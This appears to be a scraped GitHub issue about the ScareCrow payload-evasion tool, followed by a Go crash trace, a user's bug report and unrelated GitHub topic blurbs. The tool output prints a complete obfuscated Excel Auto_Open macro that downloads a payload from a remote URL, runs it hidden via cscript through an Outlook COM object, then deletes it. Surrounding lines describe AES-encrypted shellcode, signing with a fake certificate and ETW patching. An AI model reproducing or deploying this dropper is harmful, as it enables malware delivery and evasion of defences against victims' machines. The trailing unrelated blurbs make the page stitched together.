root@kali:/opt/ScareCrow# ./ScareCrow -I this.bin -Loader msiexec -domain www.microsoft.com -delivery macro -url http:///test.bin
/ / ____ _____ _______ ____ _ ___ __ ______ _ __
_____ _/ \ \ __ _/ __ / \ /_ __ / _ \ / / /
/ \ ___ / __ | | /\ /\ _| | ( <> ) /
/______ /___ >____ /| _ >______ /|| __/ /_/
/ / / / /
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[] Creating an Embedded Resource File
[+] Created Embedded Resource File With apphelp's Properties
[] Compiling Payload
[+] Payload Compiled
[] Signing apphelp.dll With a Fake Cert
[+] Signed File Created
[] Creating Loader
[] Macro Delivery Payload
[!] Excel macro that will download, execute and remove the payload:
Sub Auto_Open()
Dim UghEc As String
Dim wxnKct As String
Dim MmWsYRd As String
UghEc = Environ("AppData") & "\Microsoft\Excel"
VBA.ChDir UghEc
Dim QssSvuJy As String
Dim nKgV As String
Dim gcxBaK As Object
QssSvuJy = "http://redacted"
nKgV = ""
Set gcxBaK = CreateObject("Microsoft.XMLHTTP")
gcxBaK.Open "GET", QssSvuJy, False
gcxBaK.send
If gcxBaK.Status = 200 Then
Set EMKAG = CreateObject("ADODB.Stream")
EMKAG.Open
EMKAG.Type = 1
EMKAG.Write gcxBaK.responseBody
EMKAG.SaveToFile nKgV, 2
EMKAG.Close
End If
wxnKct = UghEc & nKgV
Set AxJpqt = GetObject("new:0006F03A-0000-0000-C000-000000000046")
AxJpqt.CreateObject("WScript.Shell").Run("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & wxnKct), 0
vLokSZ
Kill wxnKct
End Sub
Sub vLokSZ()
Dim when As Variant
Debug.Print "Start " & Now
when = Now + TimeValue("00:00:30")
Do While when > Now
DoEvents
Loop
Debug.Print "End " & Now
End Sub
panic: open : no such file or directory
goroutine 1 [running]:
ScareCrow/Utils.check(...)
/opt/ScareCrow/Utils/Utils.go:27
ScareCrow/Utils.Writefile(0x0, 0x0, 0xc0020d8000, 0x2b0dc6)
/opt/ScareCrow/Utils/Utils.go:19 +0x145
ScareCrow/Loader.CompileLoader(0x7ffd34ebce04, 0x7, 0x0, 0x0, 0xc0000b22e0, 0xb, 0x781332, 0x7, 0x7ffd34ebce30, 0x5, ...)
/opt/ScareCrow/Loader/Loader.go:1010 +0x585
main.main()
/opt/ScareCrow/ScareCrow.go:193 +0xb1b
It looks like its just getting cut off a bit soon or something.
When giving it a pkcs7 code signed cert it looks to be finishing up building and then i receive a cmd.Run() error.
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With schannel's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing schannel.dll With a Valid Cert <file>.p7b
2022/02/25 11:57:49 cmd.Run() failed with exit status 255
Additionally, my network needs a proxy for it to create a fake cert based on domain. Can you include that as an option to use a proxy to create a fake cert?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.